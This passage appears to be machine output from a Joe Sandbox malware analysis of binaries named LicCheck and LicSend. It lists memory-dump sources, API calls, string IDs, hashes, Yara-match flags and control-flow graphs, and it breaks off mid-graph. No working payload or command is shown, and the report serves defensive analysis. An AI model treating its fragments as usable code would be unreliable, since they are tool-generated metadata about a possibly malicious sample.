                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    APIs
                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00793ABF
                                                                                                      • Part of subcall function 007A691B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,007A418F,?,007D3B78,00792904,string too long,00792904,?,?,?), ref: 007A697B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                    APIs
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 007962F7
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00796384
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_taskIos_base_dtorstd::ios_base::_
                                                                                                    • String ID: (Hy
                                                                                                    APIs
                                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 007A8ED4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EncodePointer
                                                                                                    • String ID: MOC$RCC
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 007A449F
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 007A44F7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                    • String ID: 0'y
                                                                                                    APIs
                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,007B3A93,-00000020,00000FA0,00000000,00000002,00000040,?,61DA755C), ref: 007B529C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                    • String ID: 0'y$InitializeCriticalSectionEx
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Alloc
                                                                                                    • String ID: 0'y$FlsAlloc

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:18.3%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:3.1%
                                                                                                    Total number of Nodes:524
                                                                                                    Total number of Limit Nodes:15
5472 7ff7d3b9a3c0 free 5473 7ff7d3b9a594 5472->5473 5473->5465 5475 7ff7d3b9a3d2 free 5474->5475 5476 7ff7d3b9a3ec TlsSetValue TlsFree 5474->5476 5475->5476 5476->5472 6045 7ff7d3b99730 6046 7ff7d3b99739 6045->6046 6047 7ff7d3b9973d 6046->6047 6048 7ff7d3b9a2c0 3 API calls 6046->6048 6049 7ff7d3b99755 6048->6049 6050 7ff7d3b99a31 6051 7ff7d3b99a3a 6050->6051 6055 7ff7d3b99b45 6050->6055 6052 7ff7d3b99ac0 VirtualProtect 6051->6052 6054 7ff7d3b99a4e 6051->6054 6053 7ff7d3b99afc GetLastError 6052->6053 6052->6054 6056 7ff7d3b99b10 6053->6056 6057 7ff7d3b9cb2a 6058 7ff7d3b9cb38 6057->6058 6059 7ff7d3b9cf83 6057->6059 6059->6058 6060 7ff7d3b9b280 2 API calls 6059->6060 6060->6058 6061 7ff7d3b9d029 6062 7ff7d3b9d020 6061->6062 6063 7ff7d3b9d02e localeconv 6061->6063 6064 7ff7d3b9fbf0 4 API calls 6063->6064 6065 7ff7d3b9d068 6064->6065 5506 7ff7d3b9ad2c 5507 7ff7d3b9ae68 5506->5507 5508 7ff7d3b9ad3c 5506->5508 5511 7ff7d3b9ae72 5507->5511 5512 7ff7d3b9ae21 5507->5512 5509 7ff7d3b9ad4a 5508->5509 5510 7ff7d3b9ae9c WaitForSingleObject 5508->5510 5517 7ff7d3b9ae3a 5508->5517 5513 7ff7d3b9ae47 5509->5513 5516 7ff7d3b9acb1 GetLastError TlsGetValue 5509->5516 5519 7ff7d3b9ad6f ReleaseSemaphore 5509->5519 5510->5509 5511->5508 5515 7ff7d3b9ae8c 5511->5515 5540 7ff7d3b9ac10 CreateSemaphoreW TlsAlloc 5512->5540 5518 7ff7d3b9ae90 Sleep 5515->5518 5520 7ff7d3b9accb SetLastError 5516->5520 5517->5513 5517->5516 5518->5518 5521 7ff7d3b9ae9a 5518->5521 5519->5516 5522 7ff7d3b9ad90 calloc 5520->5522 5529 7ff7d3b9acdf 5520->5529 5521->5508 5524 7ff7d3b9adb0 5522->5524 5525 7ff7d3b9aec3 abort 5522->5525 5523 7ff7d3b9aceb 5526 7ff7d3b9ac97 5523->5526 5532 7ff7d3b9ab70 5523->5532 5527 7ff7d3b9adb3 TlsSetValue 5524->5527 5531 7ff7d3b9aed5 5525->5531 5527->5523 5529->5523 5529->5525 5530 7ff7d3b9ae05 memset 5529->5530 5530->5527 5533 7ff7d3b9abc0 malloc 5532->5533 5534 7ff7d3b9ab87 malloc 5532->5534 5535 7ff7d3b9ac02 abort 5533->5535 5537 7ff7d3b9abcf 5533->5537 5534->5535 5536 7ff7d3b9ab95 
5534->5536 5538 7ff7d3b9aba8 memcpy 5536->5538 5539 7ff7d3b9abea memset 5536->5539 5537->5538 5537->5539 5538->5526 5539->5526 5541 7ff7d3b9ac60 GetLastError 5540->5541 5542 7ff7d3b9ac43 5540->5542 5541->5542 5543 7ff7d3b9ac68 abort 5542->5543 5544 7ff7d3b9ac5b 5542->5544 5544->5508 5855 7ff7d3b9d6c0 5856 7ff7d3b9d6c8 5855->5856 5857 7ff7d3b9d430 2 API calls 5856->5857 5858 7ff7d3b9d6f0 5857->5858 6066 7ff7d3b9d740 6067 7ff7d3b9d430 2 API calls 6066->6067 6068 7ff7d3b9d6f1 6067->6068 6069 7ff7d3b99f43 6070 7ff7d3b99f71 6069->6070 6071 7ff7d3b99fd3 6070->6071 6072 7ff7d3b99f7f 6070->6072 6073 7ff7d3b99ff2 signal 6070->6073 6079 7ff7d3b99fc5 6070->6079 6074 7ff7d3b99fe0 6071->6074 6076 7ff7d3b99fbc 6071->6076 6077 7ff7d3b9a030 6071->6077 6072->6077 6078 7ff7d3b99f90 6072->6078 6072->6079 6075 7ff7d3b9a008 signal 6073->6075 6073->6076 6074->6073 6074->6076 6074->6079 6075->6079 6076->6079 6081 7ff7d3b9a0e0 signal 6076->6081 6077->6076 6077->6079 6080 7ff7d3b9a03e signal 6077->6080 6078->6076 6078->6079 6082 7ff7d3b99fa6 signal 6078->6082 6080->6076 6083 7ff7d3b9a0f9 signal 6080->6083 6081->6079 6082->6076 6084 7ff7d3b9a110 signal 6082->6084 6083->6079 6084->6079 6085 7ff7d3b9ca37 6086 7ff7d3b9cb74 6085->6086 6087 7ff7d3b9ca54 6085->6087 6088 7ff7d3b9d26f wcslen 6086->6088 6089 7ff7d3b9cb9c 6086->6089 6090 7ff7d3b9b7e0 strlen 6087->6090 6091 7ff7d3b9b280 2 API calls 6089->6091 6094 7ff7d3b9ca5c 6090->6094 6092 7ff7d3b9cbb4 6091->6092 6093 7ff7d3b9d0e0 6096 7ff7d3b9b930 10 API calls 6093->6096 6094->6093 6095 7ff7d3b9b930 10 API calls 6094->6095 6095->6094 6097 7ff7d3b9d0fa 6096->6097 6097->6097 6098 7ff7d3b9a650 6099 7ff7d3b9a6e0 6098->6099 6100 7ff7d3b9a667 6098->6100 6101 7ff7d3b9a691 calloc 6100->6101 6102 7ff7d3b9a678 _assert 6100->6102 6101->6099 6103 7ff7d3b9a6a8 TlsGetValue TlsSetValue 6101->6103 6102->6101 5865 7ff7d3b9cad4 5866 7ff7d3b9d0e0 5865->5866 5867 7ff7d3b9ca64 5865->5867 5869 7ff7d3b9b930 10 API calls 5866->5869 5867->5865 5871 7ff7d3b9b930 5867->5871 
5870 7ff7d3b9d0fa 5869->5870 5870->5870 5872 7ff7d3b9b944 5871->5872 5873 7ff7d3b9b9c0 5872->5873 5874 7ff7d3b9b984 5872->5874 5875 7ff7d3b9b160 8 API calls 5873->5875 5876 7ff7d3b9b400 6 API calls 5874->5876 5877 7ff7d3b9b9cf 5875->5877 5878 7ff7d3b9b993 5876->5878 5877->5867 5878->5867 6104 7ff7d3b9cd49 6105 7ff7d3b9cd70 6104->6105 6106 7ff7d3b9cd83 6104->6106 6110 7ff7d3b9bdc0 6105->6110 6108 7ff7d3b9bdc0 10 API calls 6106->6108 6109 7ff7d3b9d119 6108->6109 6109->6109 6111 7ff7d3b9bdd4 6110->6111 6112 7ff7d3b9be40 6111->6112 6113 7ff7d3b9be0b 6111->6113 6114 7ff7d3b9b160 8 API calls 6112->6114 6115 7ff7d3b9bce0 6 API calls 6113->6115 6116 7ff7d3b9be4f 6114->6116 6117 7ff7d3b9be1a 6115->6117 6116->6106 6117->6106 5879 7ff7d3b9accb SetLastError 5880 7ff7d3b9ad90 calloc 5879->5880 5886 7ff7d3b9acdf 5879->5886 5881 7ff7d3b9adb0 5880->5881 5882 7ff7d3b9aec3 abort 5880->5882 5884 7ff7d3b9adb3 TlsSetValue 5881->5884 5883 7ff7d3b9aed5 5882->5883 5889 7ff7d3b9aceb 5884->5889 5885 7ff7d3b9ab70 5 API calls 5888 7ff7d3b9ac97 5885->5888 5886->5882 5887 7ff7d3b9ae05 memset 5886->5887 5886->5889 5887->5884 5889->5885 5889->5888

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Y//uu$}==
                                                                                                    • API String ID: 0-1096410806
                                                                                                    • Opcode ID: 85d6259d61b3ecca2f2fe6b017458283f752f61dd0bb6211a4f5604068124955
                                                                                                    • Instruction ID: c8d93c7056680f272d6fbde8504e74cf40bfd7a9748bf276e430ab4414d00fa7
                                                                                                    • Opcode Fuzzy Hash: 85d6259d61b3ecca2f2fe6b017458283f752f61dd0bb6211a4f5604068124955
                                                                                                    • Instruction Fuzzy Hash: 4CF27D6190EBC684EBA1AB25A4453AEEBE0EB45784FC44036DACC27796DF7CD144C770

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy$_wcsicmp$FileModuleNamewcscpy
                                                                                                    • String ID: Y//uu$}==
                                                                                                    • API String ID: 1189637815-1096410806
                                                                                                    • Opcode ID: 86a952fe54ebb8fdbe6481a5c7472628de9d57096e7574fd9aad0c6cb33b5af6
                                                                                                    • Instruction ID: ea8b034a85f691b119f5e10b042fbd04c1f2903341d9d60133ff416262e15ec7
                                                                                                    • Opcode Fuzzy Hash: 86a952fe54ebb8fdbe6481a5c7472628de9d57096e7574fd9aad0c6cb33b5af6
                                                                                                    • Instruction Fuzzy Hash: D0A2A021A1EB8185EB91AB29E4053EDE7A0FB85B84FC44036DACD67796EF7CD140C760

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1143 7ff7d3b976c0-7ff7d3b9776f call 7ff7d3b9aae0 call 7ff7d3b99646 call 7ff7d3b995a7 1150 7ff7d3b97d20-7ff7d3b97d38 call 7ff7d3b99646 1143->1150 1151 7ff7d3b97775-7ff7d3b97781 1143->1151 1154 7ff7d3b97d3d-7ff7d3b97d3f 1150->1154 1152 7ff7d3b97789-7ff7d3b97802 call 7ff7d3b995f5 memset call 7ff7d3b9ac70 1151->1152 1163 7ff7d3b97ca8-7ff7d3b97cdf call 7ff7d3b9ac70 call 7ff7d3b9a3b0 1152->1163 1164 7ff7d3b97808-7ff7d3b97814 call 7ff7d3b9ac70 1152->1164 1154->1151 1156 7ff7d3b97d45-7ff7d3b97d70 1154->1156 1159 7ff7d3b97d91-7ff7d3b97da2 1156->1159 1161 7ff7d3b97da4-7ff7d3b97dce call 7ff7d3b9ac70 * 2 1159->1161 1162 7ff7d3b97d78-7ff7d3b97d7c 1159->1162 1180 7ff7d3b97dd0-7ff7d3b97dff call 7ff7d3b9a3b0 1161->1180 1181 7ff7d3b97e04-7ff7d3b97e08 1161->1181 1165 7ff7d3b97ef0-7ff7d3b97f00 1162->1165 1166 7ff7d3b97d82-7ff7d3b97d8b 1162->1166 1187 7ff7d3b97ce8-7ff7d3b97d08 1163->1187 1174 7ff7d3b97816-7ff7d3b97827 1164->1174 1175 7ff7d3b9782d-7ff7d3b97849 call 7ff7d3b985b0 wcslen 1164->1175 1165->1151 1166->1159 1166->1165 1174->1175 1186 7ff7d3b9784f-7ff7d3b97898 memset wcscpy wcslen 1175->1186 1175->1187 1180->1181 1184 7ff7d3b97e0a-7ff7d3b97e29 1181->1184 1185 7ff7d3b97e2e-7ff7d3b97e3e wcsncmp 1181->1185 1184->1185 1185->1162 1188 7ff7d3b97e44-7ff7d3b97e67 1185->1188 1190 7ff7d3b97d0e-7ff7d3b97d16 1186->1190 1191 7ff7d3b9789e-7ff7d3b978ce memset wcscpy wcslen 1186->1191 1187->1190 1187->1191 1188->1151 1189 7ff7d3b97e6d-7ff7d3b97ed2 call 7ff7d3b995da 1188->1189 1189->1152 1196 7ff7d3b97ed8-7ff7d3b97ee4 1189->1196 1193 7ff7d3b978d2-7ff7d3b97ca4 wcslen * 3 call 7ff7d3b995a7 * 2 call 7ff7d3b995e9 call 7ff7d3b995c2 * 2 1190->1193 1191->1193 1196->1152
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID: wcslen$memset$wcscpy$wcsncmp
• String ID: 0$X$`
• API String ID: 4021896446-2527496196
• Opcode ID: 71c2dd0d9b89cba3038043aacf0093748c804883baea2e2f1110428d541eeabc
• Instruction ID: cba63555bd454f7f0f242f7b50572e76091f9bac122fcfd76029e5a06539a59b
• Opcode Fuzzy Hash: 71c2dd0d9b89cba3038043aacf0093748c804883baea2e2f1110428d541eeabc
• Instruction Fuzzy Hash: C1128122619BC185E3A09F25E4003AEF7A0FB85794F844226DEDC67B99DF3CD144CB60

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1307 7ff7d3b97285-7ff7d3b97291 call 7ff7d3b91e40 1310 7ff7d3b97293-7ff7d3b97296 call 7ff7d3b916f0 1307->1310 1311 7ff7d3b9729b-7ff7d3b972ac call 7ff7d3b91d90 1307->1311 1310->1311 1315 7ff7d3b972e1-7ff7d3b972f2 call 7ff7d3b91cf0 1311->1315 1316 7ff7d3b972ae-7ff7d3b972ba 1311->1316 1321 7ff7d3b97321-7ff7d3b97335 call 7ff7d3b91c40 1315->1321 1322 7ff7d3b972f4-7ff7d3b972fe 1315->1322 1317 7ff7d3b972c0-7ff7d3b972db 1316->1317 1317->1317 1319 7ff7d3b972dd 1317->1319 1319->1315 1327 7ff7d3b9733f-7ff7d3b97350 call 7ff7d3b91b90 1321->1327 1328 7ff7d3b97337-7ff7d3b9733a call 7ff7d3b91810 1321->1328 1323 7ff7d3b97300-7ff7d3b9731b 1322->1323 1323->1323 1325 7ff7d3b9731d 1323->1325 1325->1321 1332 7ff7d3b97381-7ff7d3b97392 call 7ff7d3b91ac0 1327->1332 1333 7ff7d3b97352-7ff7d3b9735f 1327->1333 1328->1327 1338 7ff7d3b973c1-7ff7d3b973d5 call 7ff7d3b91a20 1332->1338 1339 7ff7d3b97394-7ff7d3b9739e 1332->1339 1334 7ff7d3b97360-7ff7d3b9737b 1333->1334 1334->1334 1336 7ff7d3b9737d 1334->1336 1336->1332 1344 7ff7d3b973df-7ff7d3b973f0 call 7ff7d3b91970 1338->1344 1345 7ff7d3b973d7-7ff7d3b973da call 7ff7d3b91890 1338->1345 1340 7ff7d3b973a0-7ff7d3b973bb 1339->1340 1340->1340 1342 7ff7d3b973bd 1340->1342 1342->1338 1349 7ff7d3b97421-7ff7d3b97435 call 7ff7d3b918d0 1344->1349 1350 7ff7d3b973f2-7ff7d3b973fe 1344->1350 1345->1344 1355 7ff7d3b976a4-7ff7d3b976a7 call 7ff7d3b91890 1349->1355 1356 7ff7d3b9743b-7ff7d3b9745e 1349->1356 1351 7ff7d3b97400-7ff7d3b9741b 1350->1351 1351->1351 1353 7ff7d3b9741d 1351->1353 1353->1349 1361 7ff7d3b976ac 1355->1361 1357 7ff7d3b9746d-7ff7d3b9747e strstr 1356->1357 1359 7ff7d3b97460-7ff7d3b97467 1357->1359 1360 7ff7d3b97480-7ff7d3b974a2 call 7ff7d3b9ac70 * 2 1357->1360 1359->1357 1362 7ff7d3b97511-7ff7d3b97523 call 7ff7d3b98c10 1359->1362 1369 7ff7d3b974a4-7ff7d3b974c3 call 7ff7d3b9a3b0 1360->1369 1370 7ff7d3b974c8-7ff7d3b974cc 1360->1370 1361->1361 1367 7ff7d3b97528 1362->1367 1367->1355 1369->1370 1372 7ff7d3b974dd-7ff7d3b9750b strcat * 2 strlen 1370->1372 1373 7ff7d3b974ce-7ff7d3b974da 1370->1373 1372->1357 1372->1362 1373->1372
APIs
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID: strcat$strlenstrstr
• String ID:
• API String ID: 3991645906-0
• Opcode ID: 31a81c80cfb641bf43eedc5a389915bdc02a8eb2c7a98189b304857904575c5e
• Instruction ID: 34b274374ffcb91d2bbefbf9ff5113a1769942919d4dd88a95b409be31a70de8
• Opcode Fuzzy Hash: 31a81c80cfb641bf43eedc5a389915bdc02a8eb2c7a98189b304857904575c5e
• Instruction Fuzzy Hash: B061D662E0E68241FBA5E72594153BDEEE1EB8A780FC84036DAC927787DE6CD045C371

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1206 7ff7d3b9ad2c-7ff7d3b9ad36 1207 7ff7d3b9ae68-7ff7d3b9ae70 1206->1207 1208 7ff7d3b9ad3c-7ff7d3b9ad44 1206->1208 1211 7ff7d3b9ae72-7ff7d3b9ae8a 1207->1211 1212 7ff7d3b9ae21-7ff7d3b9ae26 call 7ff7d3b9ac10 1207->1212 1209 7ff7d3b9ad4a-7ff7d3b9ad51 1208->1209 1210 7ff7d3b9ae9c-7ff7d3b9aeb0 WaitForSingleObject 1208->1210 1214 7ff7d3b9ae47-7ff7d3b9ae5d 1209->1214 1215 7ff7d3b9ad57-7ff7d3b9ad5b 1209->1215 1210->1209 1213 7ff7d3b9aeb6-7ff7d3b9aebe 1210->1213 1217 7ff7d3b9ae30-7ff7d3b9ae34 1211->1217 1218 7ff7d3b9ae8c 1211->1218 1212->1217 1213->1209 1219 7ff7d3b9acb1-7ff7d3b9acd9 GetLastError TlsGetValue SetLastError 1215->1219 1220 7ff7d3b9ad61-7ff7d3b9ad69 1215->1220 1217->1208 1222 7ff7d3b9ae3a-7ff7d3b9ae41 1217->1222 1223 7ff7d3b9ae90-7ff7d3b9ae98 Sleep 1218->1223 1227 7ff7d3b9ad90-7ff7d3b9adaa calloc 1219->1227 1228 7ff7d3b9acdf-7ff7d3b9ace5 1219->1228 1220->1219 1224 7ff7d3b9ad6f-7ff7d3b9ad84 ReleaseSemaphore 1220->1224 1222->1214 1222->1219 1223->1223 1226 7ff7d3b9ae9a 1223->1226 1224->1219 1226->1217 1231 7ff7d3b9adb0 1227->1231 1232 7ff7d3b9aec3-7ff7d3b9aed3 abort 1227->1232 1229 7ff7d3b9add8-7ff7d3b9adff call 7ff7d3b9fea8 1228->1229 1230 7ff7d3b9aceb-7ff7d3b9acf7 1228->1230 1229->1232 1244 7ff7d3b9ae05-7ff7d3b9ae1f memset 1229->1244 1235 7ff7d3b9ac97-7ff7d3b9aca3 1230->1235 1236 7ff7d3b9acf9-7ff7d3b9acfc call 7ff7d3b9ab70 1230->1236 1237 7ff7d3b9adb3-7ff7d3b9adc4 TlsSetValue 1231->1237 1233 